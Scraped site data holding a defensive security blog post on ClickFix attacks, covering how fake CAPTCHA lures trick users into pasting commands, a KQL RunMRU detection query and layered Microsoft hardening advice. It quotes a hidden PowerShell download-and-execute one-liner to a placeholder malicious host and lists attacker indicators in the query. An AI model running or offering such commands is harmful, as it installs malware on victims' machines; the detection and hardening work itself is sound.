Fröhlich","people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":997,"avatar":998,"permalink":999,"twitter":1000,"linkedin":1000,"imageOffsetTop":842,"socials":1001},"Jan Geisbauer","people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[1002,1004],{"text":741,"href":1003},"https://emptydc.com",{"text":1005,"href":1006},"Podcast","https://hairlessinthecloud.com",{"display_name":1008,"avatar":1009,"permalink":1010,"twitter":1011,"linkedin":1012},"Gerrit Reinke","people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":1014,"avatar":1015,"permalink":1016,"twitter":853,"linkedin":904},"Christian Kordel","people/christian-kordel.png","/authors/christian-kordel",{"display_name":1018,"avatar":1019,"permalink":1020,"twitter":1021,"linkedin":904},"Stephan Wälde","people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":1023,"avatar":1024,"permalink":1025,"twitter":1026,"linkedin":1027},"Carolin Kanja","people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":1029,"avatar":1030,"permalink":1031,"twitter":1032,"linkedin":1032},"Adrian Ritter","people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":1034,"avatar":1035,"permalink":1036,"twitter":1037,"linkedin":1038},"Marvin Bangert","people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":1040,"avatar":1041,"permalink":1042,"twitter":1043,"linkedin":1044},"Thorsten Pickhan","people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":1046,"avatar":1047,"permalink":1048,"linkedin":1049,"twitter":853},"Christian Lorenz","people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":1051,"avatar":1052,"permalink":1053,"linkedin":1054,"twitter":853},"Denis Böhm","people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":1056,"avatar":1057,"permalink":1058,"linkedin":1059,"twitter":1060},"Fabian Bader","people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":1062,"avatar":1063,"permalink":1064,"linkedin":1065},"Juan Jose Fernandez Perez","people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":1067,"avatar":1068,"permalink":1069,"linkedin":1070},"Mahschid Sayyar","people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":1072,"avatar":1073,"permalink":1074,"linkedin":1075},"Benjamin Dassow","people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":1077,"avatar":1078,"permalink":1079,"linkedin":1080},"Markus Walschburger","people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":1082,"avatar":1083,"permalink":1084,"linkedin":1085,"imageOffsetTop":842},"Jonathan Haist","people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":1087,"avatar":1088,"permalink":1089,"linkedin":1090,"imageOffsetTop":842},"Daniel Rohregger","people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":1092,"avatar":1093,"permalink":1094,"linkedin":1095,"imageOffsetTop":940},"Thomas Naunheim","people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":1097,"avatar":1098,"permalink":1099,"linkedin":1100,"imageOffsetTop":940},"Florian Stöckl","people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":1102,"avatar":1103,"permalink":1104,"linkedin":1105,"imageOffsetTop":940},"Pascal Asch","people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":1107,"avatar":1108,"permalink":1109,"linkedin":1110,"imageOffsetTop":1111,"imageOffsetLeft":1112},"Markus Kättner","people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":1114,"avatar":1115,"permalink":1116,"linkedin":1117,"imageOffsetTop":1118,"imageOffsetLeft":1119},"Anna Ulbricht","people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"display_name":1121,"avatar":1122,"permalink":1123,"linkedin":1124,"imageOffsetTop":1125,"imageOffsetLeft":1126},"Annette Brauns","people/Annette-Brauns-8.jpg","/authors/annette-brauns","annette-brauns","95%","60%",{"Fritz Zurhorst":1128,"Alexander Schlindwein":1129,"Sophie Luna":1130,"Nadine Klein":1131,"Karsten Kleinschmidt":1132,"Julian Wendt":1133,"Holger Bunkradt":1134,"Ralf Mania":1135,"Oliver Kieselbach":1136,"Steffen Schwerdtfeger":1137,"Gunnar Winter":1138,"Jan Petersen":1139,"Thorsten Kunzi":1140,"Moritz Pohl":1141,"Thorben Pöschus":1142,"Christoph Hannebauer":1143,"Marco Scheel":1144,"Christopher Brumm":1145,"Florian Klante":1146,"Niklas Bachmann":1147,"Nils Krautkrämer":1148,"Patrick Treptau":1149,"Peter Beckendorf":1150,"Patrick Sobau":1151,"Jörg Wunderlich":1152,"Michael Breither":1153,"Christian Kanja":1154,"Zeba Hoffmann":1155,"Jochen Fröhlich":1156,"Jan Geisbauer":1157,"Gerrit Reinke":1161,"Christian Kordel":1162,"Stephan Wälde":1163,"Carolin Kanja":1164,"Adrian Ritter":1165,"Marvin Bangert":1166,"Thorsten Pickhan":1167,"Christian Lorenz":1168,"Denis Böhm":1169,"Fabian Bader":1170,"Juan Jose Fernandez Perez":1171,"Mahschid Sayyar":1172,"Benjamin Dassow":1173,"Markus Walschburger":1174,"Jonathan Haist":1175,"Daniel Rohregger":1176,"Thomas Naunheim":1177,"Florian Stöckl":1178,"Pascal Asch":1179,"Markus Kättner":1180,"Anna Ulbricht":1181,"Annette Brauns":1182},{"display_name":812,"avatar":839,"permalink":840,"linkedin":841,"imageOffsetTop":842},{"display_name":844,"avatar":845,"permalink":846,"twitter":847,"linkedin":848},{"display_name":850,"avatar":851,"permalink":852,"twitter":853,"linkedin":854,"imageOffsetLeft":855,"imageOffsetTop":856},{"display_name":858,"avatar":859,"permalink":860,"twitter":861,"linkedin":862,"imageOffsetTop":842},{"display_name":864,"avatar":865,"permalink":866,"twitter":867,"linkedin":868},{"display_name":870,"avatar":871,"permalink":872,"linkedin":873},{"display_name":875,"avatar":876,"permalink":877,"linkedin":878,"twitter":879},{"display_name":881,"avatar":882,"permalink":883,"linkedin":884,"twitter":885},{"display_name":887,"avatar":888,"permalink":889,"linkedin":890,"twitter":891},{"display_name":893,"avatar":894,"permalink":895,"linkedin":896,"twitter":897,"imageOffsetTop":898,"imageOffsetLeft":899},{"display_name":901,"avatar":902,"permalink":903,"twitter":853,"linkedin":904},{"display_name":906,"avatar":907,"permalink":908,"twitter":853,"linkedin":909},{"display_name":911,"avatar":912,"permalink":913,"twitter":853,"linkedin":904,"imageOffsetTop":842},{"display_name":915,"avatar":916,"permalink":917,"twitter":853,"linkedin":918},{"display_name":920,"avatar":921,"permalink":922,"twitter":923,"linkedin":924},{"display_name":926,"avatar":927,"permalink":928,"twitter":853,"linkedin":904,"imageOffsetTop":842},{"display_name":930,"avatar":931,"permalink":932,"twitter":933,"linkedin":933},{"display_name":935,"avatar":936,"permalink":937,"twitter":938,"linkedin":939,"imageOffsetTop":940},{"display_name":942,"avatar":943,"permalink":944,"linkedin":945,"twitter":853},{"display_name":947,"avatar":948,"permalink":949,"linkedin":950,"twitter":853},{"display_name":952,"avatar":953,"permalink":954,"twitter":955,"linkedin":956},{"display_name":958,"avatar":959,"permalink":960,"linkedin":961,"twitter":853},{"display_name":963,"avatar":964,"permalink":965,"linkedin":966,"twitter":853,"imageOffsetTop":842},{"display_name":968,"avatar":969,"permalink":970,"linkedin":971,"twitter":853},{"display_name":973,"avatar":974,"permalink":975,"twitter":853},{"display_name":977,"avatar":978,"permalink":979,"twitter":853,"linkedin":980},{"display_name":982,"avatar":983,"permalink":984,"twitter":985,"linkedin":986},{"display_name":988,"avatar":989,"permalink":990,"linkedin":991,"twitter":853},{"display_name":993,"avatar":994,"permalink":995,"twitter":853,"linkedin":904},{"display_name":997,"avatar":998,"permalink":999,"twitter":1000,"linkedin":1000,"imageOffsetTop":842,"socials":1158},[1159,1160],{"text":741,"href":1003},{"text":1005,"href":1006},{"display_name":1008,"avatar":1009,"permalink":1010,"twitter":1011,"linkedin":1012},{"display_name":1014,"avatar":1015,"permalink":1016,"twitter":853,"linkedin":904},{"display_name":1018,"avatar":1019,"permalink":1020,"twitter":1021,"linkedin":904},{"display_name":1023,"avatar":1024,"permalink":1025,"twitter":1026,"linkedin":1027},{"display_name":1029,"avatar":1030,"permalink":1031,"twitter":1032,"linkedin":1032},{"display_name":1034,"avatar":1035,"permalink":1036,"twitter":1037,"linkedin":1038},{"display_name":1040,"avatar":1041,"permalink":1042,"twitter":1043,"linkedin":1044},{"display_name":1046,"avatar":1047,"permalink":1048,"linkedin":1049,"twitter":853},{"display_name":1051,"avatar":1052,"permalink":1053,"linkedin":1054,"twitter":853},{"display_name":1056,"avatar":1057,"permalink":1058,"linkedin":1059,"twitter":1060},{"display_name":1062,"avatar":1063,"permalink":1064,"linkedin":1065},{"display_name":1067,"avatar":1068,"permalink":1069,"linkedin":1070},{"display_name":1072,"avatar":1073,"permalink":1074,"linkedin":1075},{"display_name":1077,"avatar":1078,"permalink":1079,"linkedin":1080},{"display_name":1082,"avatar":1083,"permalink":1084,"linkedin":1085,"imageOffsetTop":842},{"display_name":1087,"avatar":1088,"permalink":1089,"linkedin":1090,"imageOffsetTop":842},{"display_name":1092,"avatar":1093,"permalink":1094,"linkedin":1095,"imageOffsetTop":940},{"display_name":1097,"avatar":1098,"permalink":1099,"linkedin":1100,"imageOffsetTop":940},{"display_name":1102,"avatar":1103,"permalink":1104,"linkedin":1105,"imageOffsetTop":940},{"display_name":1107,"avatar":1108,"permalink":1109,"linkedin":1110,"imageOffsetTop":1111,"imageOffsetLeft":1112},{"display_name":1114,"avatar":1115,"permalink":1116,"linkedin":1117,"imageOffsetTop":1118,"imageOffsetLeft":1119},{"display_name":1121,"avatar":1122,"permalink":1123,"linkedin":1124,"imageOffsetTop":1125,"imageOffsetLeft":1126},"Authors","6Y7BfYE7TWcvXULhz2gC_QgIoEgDksyJ8gExl9_0xy8",[1186],{"id":1187,"title":1188,"author":1189,"body":1190,"cta":777,"description":821,"eventid":777,"extension":824,"hideInRecent":762,"layout":1697,"meta":1698,"moment":1702,"navigation":521,"path":1744,"seo":1745,"stem":1746,"tags":1747,"webcast":762,"__hash__":1751},"content_en/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. When the user is the exploit, and how to stop it",[812,858],{"type":814,"value":1191,"toc":1686},[1192,1197,1200,1203,1210,1218,1221,1227,1230,1249,1260,1266,1272,1275,1279,1281,1284,1287,1291,1293,1296,1310,1314,1316,1323,1403,1420,1423,1427,1429,1432,1447,1450,1453,1457,1459,1462,1465,1490,1494,1496,1499,1502,1506,1508,1511,1537,1540,1543,1546,1645,1648,1651,1654,1665,1668,1672,1674,1682],[1193,1194,1196],"h2",{"id":1195},"the-clickfix-attack-chain","The ClickFix attack chain",[817,1198,1199],{},"{: .h3-font-size}",[817,1201,1202],{},"ClickFix is an attack in which users become their own attacker. No exploit, no vulnerability. The victim runs the malicious code, with a single copy and paste.",[817,1204,1205],{},[1206,1207],"img",{"alt":1208,"src":1209},"ClickFix attack chain in five stages: the lure, the trick, copy and paste, execute, infected.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[817,1211,1212,1213,1217],{},"The lure is social engineering: a fake CAPTCHA on a malicious site, a fake support message (\"your browser needs an update\"), a phishing email, or a fake meeting page. While the victim is on the site, JavaScript writes the payload into the clipboard via ",[1214,1215,1216],"code",{},"clipboard.writeText()",". Then the page asks the user to press Win+R, Ctrl+V, Enter. The Run dialog executes whatever was pasted.",[817,1219,1220],{},"A typical lure looks like this:",[817,1222,1223],{},[1206,1224],{"alt":1225,"src":1226},"Screenshot of a fake CAPTCHA lure that tells the user to press Win, X, then paste and Enter to run a command.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[817,1228,1229],{},"The command it drops into the clipboard looks like this:",[1231,1232,1234],"div",{"style":1233},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[1235,1236,1240],"pre",{"className":1237,"code":1238,"language":1239,"meta":821,"style":821},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[1214,1241,1242],{"__ignoreMap":821},[1243,1244,1247],"span",{"class":1245,"line":1246},"line",1,[1243,1248,1238],{},[817,1250,1251,1252,1255,1256,1259],{},"Two things happen at once. PowerShell starts in a hidden window (",[1214,1253,1254],{},"-w h","), and ",[1214,1257,1258],{},"iex(irm …)"," downloads the script, and executes it without explicitly saving it as a script file. This reduces opportunities for file-based scanning, but Defender can still inspect the script through AMSI and detect malicious behavior. The second stage is usually an infostealer (Lumma, Vidar, RedLine, StealC), a remote access trojan, or a ransomware loader.",[817,1261,1262,1263,1265],{},"The same pattern in Microsoft Defender telemetry, one hidden PowerShell started from Windows Terminal, running ",[1214,1264,1258],{},":",[817,1267,1268],{},[1206,1269],{"alt":1270,"src":1271},"Microsoft Defender Inspect record showing the process chain WindowsTerminal.exe to pwsh.exe to powershell.exe running an iex(irm ...) command.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[817,1273,1274],{},"The reason this works so well: everything runs in user context, no administrator privileges required. Cookies, stored passwords, and session tokens all sit within reach of a standard user. The attacker does not need to escalate to get what they came for.",[1193,1276,1278],{"id":1277},"what-microsoft-defender-detects","What Microsoft Defender detects",[817,1280,1199],{},[817,1282,1283],{},"Microsoft has invested heavily in ClickFix detection over the past months. If your Defender is healthy and correctly configured, you get native detections for ClickFix payloads. Since Q2 2025, MDE publishes behavior-based alerts under titles such as \"Suspicious 'ClickFix' behavior detected\", \"Malicious PowerShell command executed via Run dialog\", or \"An active 'Pacalau' malware in a command line was prevented from executing\". These fire from the MDE cloud engine on process-chain analysis, in parallel to the AV detection and often a few seconds earlier.",[817,1285,1286],{},"The configuration that makes this work is covered further down, under execution hardening.",[1193,1288,1290],{"id":1289},"where-the-native-detection-falls-short","Where the native detection falls short",[817,1292,1199],{},[817,1294,1295],{},"Cloud-based detections take time to trigger. We regularly see a gap of more than a minute between the PowerShell start and the Defender alert. A faster payload slips through that window.",[817,1297,1298,1299,1301,1302,1305,1306,1309],{},"Attackers also adapt quickly. Swap ",[1214,1300,1239],{}," for ",[1214,1303,1304],{},"mshta http://..."," or ",[1214,1307,1308],{},"msiexec /i http://...",", both classic LOLBins, and the PowerShell-specific detections no longer apply.",[1193,1311,1313],{"id":1312},"closing-the-gap-a-runmru-hunt","Closing the gap: a RunMRU hunt",[817,1315,1199],{},[817,1317,1318,1319,1322],{},"We close that gap with custom detections. The starting point is a KQL query on the ",[1214,1320,1321],{},"RunMRU"," registry key, which records every command a user types into the Win+R dialog.",[1231,1324,1326],{"style":1325},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0 1rem 0",[1235,1327,1331],{"className":1328,"code":1329,"language":1330,"meta":821,"style":821},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[1214,1332,1333,1338,1343,1349,1355,1361,1367,1373,1379,1385,1391,1397],{"__ignoreMap":821},[1243,1334,1335],{"class":1245,"line":1246},[1243,1336,1337],{},"DeviceRegistryEvents\n",[1243,1339,1340],{"class":1245,"line":822},[1243,1341,1342],{},"| where ActionType =~ \"RegistryValueSet\"\n",[1243,1344,1346],{"class":1245,"line":1345},3,[1243,1347,1348],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[1243,1350,1352],{"class":1245,"line":1351},4,[1243,1353,1354],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[1243,1356,1358],{"class":1245,"line":1357},5,[1243,1359,1360],{},"| where RegistryValueData has \" ✅ \"\n",[1243,1362,1364],{"class":1245,"line":1363},6,[1243,1365,1366],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[1243,1368,1370],{"class":1245,"line":1369},7,[1243,1371,1372],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[1243,1374,1376],{"class":1245,"line":1375},8,[1243,1377,1378],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[1243,1380,1382],{"class":1245,"line":1381},9,[1243,1383,1384],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[1243,1386,1388],{"class":1245,"line":1387},10,[1243,1389,1390],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[1243,1392,1394],{"class":1245,"line":1393},11,[1243,1395,1396],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[1243,1398,1400],{"class":1245,"line":1399},12,[1243,1401,1402],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[817,1404,1405,1406,1409,1410,1409,1413,1409,1416,1419],{},"The query flags any Win+R entry that looks like a ClickFix command: PowerShell, mshta, curl, or msiexec together with typical indicators like ",[1214,1407,1408],{},"-w hidden",", ",[1214,1411,1412],{},"iex",[1214,1414,1415],{},"irm",[1214,1417,1418],{},"DownloadString",", or Base64-encoded payloads. It also catches the subtle tricks. The green checkmark emoji that many fake CAPTCHA lures paste in front of the command. Unicode characters from Cyrillic, Arabic, or Thai ranges that attackers use to disguise text and slip past simple string filters. If one of these patterns shows up in a Win+R entry, a ClickFix attack is very likely in progress.",[817,1421,1422],{},"For our CSOC customers we run this and further custom detections to close the gap between new attack techniques and built-in coverage.",[1193,1424,1426],{"id":1425},"prevention-layer-1-block-the-delivery","Prevention layer 1: block the delivery",[817,1428,1199],{},[817,1430,1431],{},"Now for prevention. ClickFix is common and successful, so a single control is not enough. We work in layers, from delivery to execution.",[817,1433,1434,1435,1438,1439,1442,1443,1446],{},"Network Protection blocks known delivery domains and C2 servers for all browsers. MDE Web Content Filtering adds categories like \"Newly registered domains\", \"Hacking\", and \"Illegal Software\". Network Protection is built into Windows, but for third-party browsers you have to disable QUIC and ECH, because both encrypt the full connection and hide the target domain. Disable QUIC in Chrome and Firefox via enterprise policy (",[1214,1436,1437],{},"QuicAllowed = Disabled"," in Chrome, ",[1214,1440,1441],{},"network.http.http3.enable = false"," in Firefox); for ECH, set ",[1214,1444,1445],{},"EncryptedClientHelloEnabled = Disabled"," in Chrome.",[817,1448,1449],{},"For Edge, turn on SmartScreen. For third-party browsers, activate their built-in Safe Browsing. It is not the same as Network Protection, but it helps filter harmful sites. For the mail vector, Safe Links and Safe Attachments inspect links and attachments before users interact with them.",[817,1451,1452],{},"The catch: all of this only works against known infrastructure. Current ClickFix campaigns run on freshly registered infrastructure that gets identified and blocked too late, and sometimes on legitimate sites that a threat actor has compromised. So we look at what protects after the lure has landed.",[1193,1454,1456],{"id":1455},"prevention-layer-2-block-the-trick","Prevention layer 2: block the trick",[817,1458,1199],{},[817,1460,1461],{},"A few Edge features raise the bar while the user is on a malicious site. Governing browser extensions stops users from installing malicious or compromised extensions that inject ClickFix overlays or manipulate the clipboard themselves. Edge Enhanced Security Mode applies stricter protections on unknown and rarely visited sites (JIT disabled, Control Flow Guard, hardware-enforced stack protection), which makes exploit-based browser takeovers much harder. Typo protection warns on typosquatted domains (micros0ft.com, paypa1.com) and blocks a common ClickFix delivery vector through spoofed brand domains.",[817,1463,1464],{},"Technical controls are only half of it. User education stays essential. The one rule that carries most of the weight: if a web page tells you to paste something into your computer, it is an attack. Make that concrete in awareness training:",[1466,1467,1469,1470,1469,1478,1469,1484],"ul",{"style":1468},"margin: 0.25rem 0","\n  ",[1471,1472,1473,1477],"li",{},[1474,1475,1476],"strong",{},"Show real lures:"," fake \"Verify you are human\" checkboxes, \"your browser needs an update\", \"the document failed to render, run this fix\", broken Teams or Zoom audio prompts.",[1471,1479,1480,1483],{},[1474,1481,1482],{},"Demonstrate the clipboard trick:"," show how the site silently overwrites the clipboard.",[1471,1485,1486,1489],{},[1474,1487,1488],{},"Make reporting easy:"," fast and without blame.",[1193,1491,1493],{"id":1492},"prevention-layer-3-block-the-action","Prevention layer 3: block the action",[817,1495,1199],{},[817,1497,1498],{},"There are a few ways to harden the system here, none of them a guarantee. Start by disabling the Run dialog, which removes the Win+R entry point. Microsoft's ClickFix guidance suggests disabling it \"where it isn't necessary\". It closes the specific Win+R paste attack, but alternative launch surfaces remain, such as the Explorer address bar and Windows Terminal.",[817,1500,1501],{},"Edge's DefaultClipboardSetting restricts clipboard operations governed by the clipboard site permission. It does not block all clipboard writes and should not be treated as a reliable ClickFix prevention control.",[1193,1503,1505],{"id":1504},"prevention-layer-4-block-the-execution","Prevention layer 4: block the execution",[817,1507,1199],{},[817,1509,1510],{},"Before the advanced features, get the fundamentals in place. For ClickFix, that means:",[1466,1512,1469,1513,1469,1519,1469,1525,1469,1531],{"style":1468},[1471,1514,1515,1518],{},[1474,1516,1517],{},"Local admin reduction:"," remove local administrator rights from end users wherever possible, to limit the impact of code execution.",[1471,1520,1521,1524],{},[1474,1522,1523],{},"Endpoint Privilege Management (EPM):"," let users work as standard users and elevate only approved apps through policy rules.",[1471,1526,1527,1530],{},[1474,1528,1529],{},"UAC hardening:"," review secure desktop enforcement, prompt behavior for admins and standard users, and installer detection.",[1471,1532,1533,1536],{},[1474,1534,1535],{},"Credential Guard:"," isolate NTLM hashes, Kerberos tickets, and other credential material with virtualization-based security, so credential theft stays hard even after an attacker gains admin rights.",[817,1538,1539],{},"These controls reduce escalation opportunities, protect credentials, and enforce least privilege. Note the limit: they constrain what happens after a compromise. They do not stop a standard-user infostealer from reading user-readable cookies, session tokens, and app credential stores.",[817,1541,1542],{},"Then Microsoft Defender. Defender AV can catch the second-stage payload, but only with the right settings: turn on cloud protection and set the protection level to High or High+. AMSI, the Antimalware Scan Interface, lets applications submit content to Defender for inspection at runtime, after it has been decrypted or deobfuscated in memory but before it executes. PowerShell uses AMSI to identify malicious code, and AMSI needs real-time protection and behavior monitoring.",[817,1544,1545],{},"At least five Attack Surface Reduction rules are relevant against ClickFix:",[1231,1547,1549],{"style":1548},"margin: 0.5rem 0 2rem; overflow-x: auto",[1550,1551,1469,1553,1469,1572],"table",{"style":1552},"width:100%; border-collapse: collapse; font-size: 1rem",[1554,1555,1556,1557,1469],"thead",{},"\n    ",[1558,1559,1560,1561,1560,1566,1560,1569,1556],"tr",{},"\n      ",[1562,1563,1565],"th",{"style":1564},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Rule",[1562,1567,1568],{"style":1564},"GUID",[1562,1570,1571],{"style":1564},"ClickFix relevance",[1573,1574,1556,1575,1556,1591,1556,1606,1556,1619,1556,1632,1469],"tbody",{},[1558,1576,1560,1577,1560,1582,1560,1588,1556],{},[1578,1579,1581],"td",{"style":1580},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Block execution of potentially obfuscated scripts",[1578,1583,1585],{"style":1584},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[1214,1586,1587],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[1578,1589,1590],{"style":1580},"Obfuscated or encoded scripts at the execution and evasion stage",[1558,1592,1560,1593,1560,1597,1560,1603,1556],{},[1578,1594,1596],{"style":1595},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Block JavaScript or VBScript from launching downloaded executable content",[1578,1598,1600],{"style":1599},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[1214,1601,1602],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[1578,1604,1605],{"style":1595},"WSH, .js, or .vbs launching downloaded payloads",[1558,1607,1560,1608,1560,1611,1560,1616,1556],{},[1578,1609,1610],{"style":1580},"Block executable files from running unless they meet a prevalence, age, or trusted-list criterion",[1578,1612,1613],{"style":1584},[1214,1614,1615],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[1578,1617,1618],{"style":1580},"Fresh or rare dropped executables",[1558,1620,1560,1621,1560,1624,1560,1629,1556],{},[1578,1622,1623],{"style":1595},"Block executable content from email client and webmail",[1578,1625,1626],{"style":1599},[1214,1627,1628],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[1578,1630,1631],{"style":1595},"Email-delivered ClickFix variants",[1558,1633,1560,1634,1560,1637,1560,1642,1556],{},[1578,1635,1636],{"style":1580},"Block all Office applications from creating child processes",[1578,1638,1639],{"style":1584},[1214,1640,1641],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[1578,1643,1644],{"style":1580},"Office-lure variants spawning interpreters",[817,1646,1647],{},"Roll ASR out audit first, then pilot, then block. Tamper Protection is the last line: it stops the attacker from disabling your detections.",[817,1649,1650],{},"On PowerShell itself, reduce the risk from legacy interpreters. Identify and, where feasible, remove Windows PowerShell 2.0 and legacy VBScript components, which lack the logging and security features of newer versions. The next step is Constrained Language Mode (CLM), which restricts the language elements PowerShell exposes and blocks many script-based techniques. CLM only has robust security value when a system application-control policy enforces it (App Control for Business); the environment-variable and AppLocker variants are weaker and bypassable. And many systems need Full Language Mode to work, for example software deployment tooling, so CLM is often feasible only in selected environments.",[817,1652,1653],{},"That brings us to App Control for Business (formerly WDAC). App Control enforces a code-integrity policy over which executables, scripts, and drivers may run. The strategic posture is default-deny plus Microsoft's recommended block rules, the known LOLBin and bypass blocklist. App Control is also the correct enforcement path for PowerShell CLM. Script enforcement blocks MSHTA and MSXML script hosts, constrains PowerShell to CLM, and blocks unallowed Windows Script Host use. A few behavioral facts matter:",[1466,1655,1469,1656,1469,1659,1469,1662],{"style":1468},[1471,1657,1658],{},"Base policies that trust Windows do not automatically block trusted LOLBins. You have to merge Microsoft's recommended block rules to close the known bypasses.",[1471,1660,1661],{},"App Control does not block signed powershell.exe or cmd.exe from launching. It constrains what they may do (CLM, no unsigned or unallowed payload) and does not govern cmd.exe, .bat, or .cmd script content. This is why it is layered with ASR and launch hardening, not used alone.",[1471,1663,1664],{},"Audit mode is not neutral: script enforcement in audit still blocks MSHTA and MSXML execution and can change PowerShell CLM behavior. So App Control audit must be pilot- or ring-scoped from the first deployment, never fleet-wide.",[817,1666,1667],{},"App Control is the highest-confidence single control against the interpreter, LOLBin, and payload-execution stages, and it enforces robust CLM. It also carries the highest deployment complexity and rollback risk, since a misconfiguration blocks execution. 